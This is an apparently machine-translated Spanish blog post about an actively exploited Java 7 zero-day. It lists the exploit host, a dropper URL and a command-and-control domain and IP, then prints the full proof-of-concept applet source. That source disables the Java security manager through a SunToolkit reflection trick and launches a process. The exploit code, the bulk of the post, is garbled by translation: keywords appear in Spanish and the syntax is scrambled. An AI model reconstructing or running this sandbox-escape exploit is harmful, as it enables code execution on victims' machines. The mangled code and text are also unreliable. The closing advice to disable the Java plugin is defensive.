Tweet
Follow @gansomer
Que está siendo explotada activamente en Internet. Los más Las recientes en tiempo de ejecución (JRE 1.7x) Vulnerables hijo tambien.
Inicialmente, los Investigadores descubrieron Que Este exploit estába Hospedado en ok.XXX4.net y actualmente está resolviendo Este Dominio Una IP de China. La Explotación de Vulnerabilidad
ADEMAS ESTA Descarga sin ejecutable (Dropper.MsPMs) alojado en el Mismo Servidor ( http://ok.XXX4.net/meeting/hi.exe ). El gotero also Conecta al C & C hello.icon.pk Que actualmente Resuelve con la IP 223.25.233.244 localizada en Singapur.
POC:
Se ha DESARROLLADO sin módulo de Metasploit Que Se ha probado con Éxito en Windows 7 SP1 parcheado con Java 7 Update 6, y en Entornos the following:
- Mozilla Firefox en Ubuntu Linux 10.04
- Internet Explorer / Mozilla Firefox / Chrome en Windows XP
- Internet Explorer / Mozilla Firefox en Windows Vista
- Internet Explorer / Mozilla Firefox en Windows 7
- Safari en OS X 10.7.4
/ / / / CVE-2012-XXXX Java 0 días / / / / Aquí presentados: http://blog.fireeye.com/research/2012/08/zero-day-season-is-not-over-yet.html / / / / Secret host / ip: ok.aa24.net / 59.120.154.62 / / / / Regurgitado por jduck / / / / Probablemente un módulo de Metasploit pronto ... / / paquete cve2012xxxx; importar java.applet.Applet; java.awt.Graphics importación; importar java.beans.Expression; importar java.beans.Statement; importar java.lang.reflect.Field; importar java.net.URL; java.security import *.; java.security.cert.Certificate importación; público Gondvv clase extends Applet { público Gondvv () { } disableSecurity public void () lanza Throwable { LocalStatement = Declaración Declaración nuevo (System.class ", setSecurityManager", new Object [1]); Permisos Permisos localPermissions = new (); localPermissions.add (AllPermission nuevo ()); ProtectionDomain localProtectionDomain = new ProtectionDomain (nuevo CodeSource (nueva dirección URL ("file :/ / /"), Certificado de nuevo [0]), localPermissions); AccessControlContext localAccessControlContext = new AccessControlContext (nuevo ProtectionDomain [] { localProtectionDomain }); SetField (Statement.class, "acc", localStatement, localAccessControlContext); localStatement.execute (); } GetClass Clase privada (String paramString) lanza Throwable { Objeto arrayOfObject [] = new Object [1]; arrayOfObject [0] = paramString; LocalExpression = Expresión Expresión nuevo (Class.class ", forName", arrayOfObject); localExpression.execute (); return (Clase) localExpression.getValue (); } private void SetField (Clase paramClass, String paramString, objeto paramObject1, objeto paramObject2) lanza Throwable { Objeto arrayOfObject [] = new Object [2]; arrayOfObject [0] = paramClass; arrayOfObject [1] = paramString; LocalExpression = Expresión Expresión nuevo (GetClass ("sun.awt.SunToolkit"), "getField", arrayOfObject); localExpression.execute (); . ((Campo) localExpression.getValue ()) set (paramObject1, paramObject2); } public void init () { tratar de { disableSecurity (); Proceso localProcess = null; localProcess Runtime.getRuntime = () exec ("calc.exe").; if (localProcess = null!); localProcess.waitFor (); } catch (Throwable localThrowable) { localThrowable.printStackTrace (); } } public void paint (Graphics paramGraphics) { paramGraphics.drawString ("Loading", 50, 25); } }De Momento Oracle no ha Publicado ningun parche ASI Que Se Recomienda a los Usuarios de Java Desactivar el complemento de Su Navegador o Desinstalar Java Completamente del Sistema.
Fuente: [POC] El código fuente para el Nuevo 0-day exploit Java está disponible
No hay comentarios:
Publicar un comentario